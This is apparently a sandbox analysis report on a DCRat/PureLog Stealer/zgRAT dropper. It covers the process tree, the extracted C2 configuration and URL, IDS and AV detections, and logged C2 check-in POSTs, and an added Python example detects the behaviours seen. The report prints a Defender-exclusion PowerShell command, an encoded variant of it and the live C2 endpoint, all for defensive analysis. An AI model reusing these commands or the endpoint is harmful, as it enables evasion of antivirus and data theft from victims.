
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1569008
MD5: c9059dfb76ad9e011d4e11608ccc98cc
SHA1: c7ec739a977cc99a19e39103e2a20d59a6094508
SHA256: 906e30690506eb761b3f84f7ae1146db9dc796e60d87303173fc99370485c58f
Tags: exe, user-Bitsight

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C9059DFB76AD9E011D4E11608CCC98CC)
    • wscript.exe (PID: 7672 cmdline: "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chainportruntimeCrtMonitor.exe (PID: 7876 cmdline: "C:\MsContainer/chainportruntimeCrtMonitor.exe" MD5: 38514F88AFF517EA6BE4724D24B28FE2)
          • powershell.exe (PID: 7972 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7428 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • cmd.exe (PID: 8072 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8128 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 8144 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • kahKUDRlEYHfKIalWlM.exe (PID: 7644 cmdline: "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe" MD5: 38514F88AFF517EA6BE4724D24B28FE2)
  • kahKUDRlEYHfKIalWlM.exe (PID: 7244 cmdline: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe MD5: 38514F88AFF517EA6BE4724D24B28FE2)
  • kahKUDRlEYHfKIalWlM.exe (PID: 7264 cmdline: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe MD5: 38514F88AFF517EA6BE4724D24B28FE2)
  • svchost.exe (PID: 3220 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Malware Configuration

Threatname: DCRat
{"C2 url": "http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Overview

Initial Sample
Source | Rule | Description | Author
file.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
file.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Dropped Files
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\MsContainer\chainportruntimeCrtMonitor.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\MsContainer\chainportruntimeCrtMonitor.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Memory Dumps
Source | Rule | Description | Author
00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000000.00000003.1643679277.00000000068D9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000004.00000000.1762447136.0000000000572000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Unpacked PEs
Source | Rule | Description | Author
0.3.file.exe.69276f8.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.3.file.exe.69276f8.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.3.file.exe.52886f8.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.3.file.exe.52886f8.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.3.file.exe.52886f8.1.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security

                                  System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7876, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', ProcessId: 7972, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7876, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', ProcessId: 7972, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7876, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', ProcessId: 7972, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7628, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" , ProcessId: 7672, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\MsContainer/chainportruntimeCrtMonitor.exe", ParentImage: C:\MsContainer\chainportruntimeCrtMonitor.exe, ParentProcessId: 7876, ParentProcessName: chainportruntimeCrtMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe', ProcessId: 7972, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3220, ProcessName: svchost.exe

Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T10:53:17.949836+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 193.3.168.50 | 80 | TCP
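The Sigma hits above are matched on process-creation telemetry. The Python below is an added example, not part of the Joe Sandbox report or of any Sigma rule, showing how the three behaviours that fired in this chain (a Defender exclusion added through Add-MpPreference, a script host running a .vbe from a user-writable directory, and ping -n 10 localhost used as a sleep) can be checked against such events. The event records are constructed from the process tree in this report; the field names, rule names, the PIDs 9001-9003 of the added control events and the decoding of -EncodedCommand are the example's own assumptions. One detail worth keying on: the wscript.exe Data above names C:\Windows\System32\WScript.exe on the command line while the logged Image is C:\Windows\SysWOW64\wscript.exe, because the 32-bit SFX parent is subject to WOW64 file-system redirection. Detections should therefore match the logged image, not the path in the command line.

```python
"""Flag the process-creation behaviours from this report's Sigma section.

Added example: not part of the Joe Sandbox report or of any Sigma rule.
Event records are constructed from the report's process tree; field names
and rule names are this example's own.
"""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str         # image path as logged (the real, post-redirection path)
    cmdline: str       # command line as logged
    parent_image: str  # parent image path, "" where the report does not record one


def _b64_utf16(text: str) -> str:
    """PowerShell's -EncodedCommand takes base64 over UTF-16LE."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed from the report's process tree (PIDs, paths and command lines as listed
# there); the last three events are added controls with hypothetical PIDs.
EVENTS = [
    ProcEvent(7628, r"C:\Users\user\Desktop\file.exe", r'"C:\Users\user\Desktop\file.exe"', ""),
    # Command line says System32, logged image is SysWOW64: WOW64 redirection of a 32-bit parent.
    ProcEvent(7672, r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe"',
              r"C:\Users\user\Desktop\file.exe"),
    ProcEvent(7832, r"C:\Windows\System32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "',
              r"C:\Windows\SysWOW64\wscript.exe"),
    ProcEvent(7972, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              '"powershell" -Command Add-MpPreference -ExclusionPath '
              r"'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'",
              r"C:\MsContainer\chainportruntimeCrtMonitor.exe"),
    ProcEvent(8144, r"C:\Windows\System32\PING.EXE", "ping -n 10 localhost",
              r"C:\Windows\System32\cmd.exe"),
    # Constructed: the same exclusion hidden behind -EncodedCommand.
    ProcEvent(9001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -enc "
              + _b64_utf16(r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"),
              r"C:\Windows\System32\cmd.exe"),
    # Constructed benign controls: a read-only Defender query and a real reachability ping.
    ProcEvent(9002, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -Command Get-MpPreference", r"C:\Windows\explorer.exe"),
    ProcEvent(9003, r"C:\Windows\System32\PING.EXE", "ping -n 1 10.0.0.1", r"C:\Windows\System32\cmd.exe"),
]

MP_EXCLUSION = re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)  # common spellings
SCRIPT_ARG = re.compile(r'([^"\s]+\.(?:vbe|vbs|js|jse|wsf|wsh))(?=["\s]|$)', re.I)
PING_SLEEP = re.compile(r"-n\s+(\d+)\s+(?:localhost|127\.0\.0\.1|::1)(?:\s|$)", re.I)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")  # scripts under these are not flagged


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _effective_powershell_cmdline(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload so the checks see what will actually run."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16LE: check the raw line only
    return f"{cmdline} {decoded}"


def detect(events):
    """Return (rule_name, pid) tuples for events matching one of the three checks."""
    hits = []
    for ev in events:
        exe, parent = _basename(ev.image), _basename(ev.parent_image)
        if exe in ("powershell.exe", "pwsh.exe"):
            if MP_EXCLUSION.search(_effective_powershell_cmdline(ev.cmdline)):
                hits.append(("defender_exclusion_added", ev.pid))
        elif exe in ("wscript.exe", "cscript.exe"):
            m = SCRIPT_ARG.search(ev.cmdline)
            if m and not m.group(1).lower().startswith(TRUSTED_DIRS):
                hits.append(("script_host_ran_untrusted_script", ev.pid))
        elif exe == "ping.exe" and parent == "cmd.exe":
            m = PING_SLEEP.search(ev.cmdline)
            if m and int(m.group(1)) > 1:
                hits.append(("ping_used_as_sleep", ev.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:<34} pid={pid}")
```

Run stand-alone it lists four hits (PIDs 7972, 9001, 7672 and 8144) and nothing for the two controls. The Defender check is deliberately applied to the decoded payload as well, because the plain-text command line in this report is the easy case; the same exclusion behind -EncodedCommand would slip past a pattern that only looks at the visible arguments.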


                                  AV Detection

Source: file.exe | Avira: detected
Source: http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php | Avira URL Cloud: Label: malware
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\GYwcCMoE.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\aEtIhTbg.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: 00000004.00000002.1801521334.0000000012BCD000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\GYwcCMoE.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\UFpBXUVk.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\YuXIhBvf.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\ZlAIxOci.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\aEtIhTbg.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\jYCYFtEB.log | ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\pQfxiZJp.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\vCAeICGo.log | ReversingLabs: Detection: 15%
Source: file.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\Desktop\YuXIhBvf.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\vCAeICGo.log | Joe Sandbox ML: detected
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\jYCYFtEB.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\WzsROUza.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\QRPSxHgy.log | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\pQfxiZJp.log | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 14_2_00007FFD9BD009FA CryptUnprotectData | 14_2_00007FFD9BD009FA
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 14_2_00007FFD9BD011CE CryptUnprotectData | 14_2_00007FFD9BD011CE
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: file.exe
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb | source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2943770878.000000001CFAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AppDINetCookntkrnlmp.pdb | source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2943770878.000000001CFAE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError | 0_2_00E3A69B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW | 0_2_00E4C220
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\AppData
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File opened: C:\Users\user\AppData\Local

                                  Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 4_2_00007FFD9B93CD6D
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 4x nop then jmp 00007FFD9B791C96h | 14_2_00007FFD9B791A8E
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 14_2_00007FFD9B93CD6D
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 4x nop then jmp 00007FFD9BD00679h | 14_2_00007FFD9BD003E8
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 4x nop then jmp 00007FFD9BD00679h | 14_2_00007FFD9BD00578
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Code function: 4x nop then jmp 00007FFD9BD00679h | 14_2_00007FFD9BD00588

                                  Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49734 -> 193.3.168.50:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View | ASN Name: ARNES-NET Academic and Research Network of Slovenia SI
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 384Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
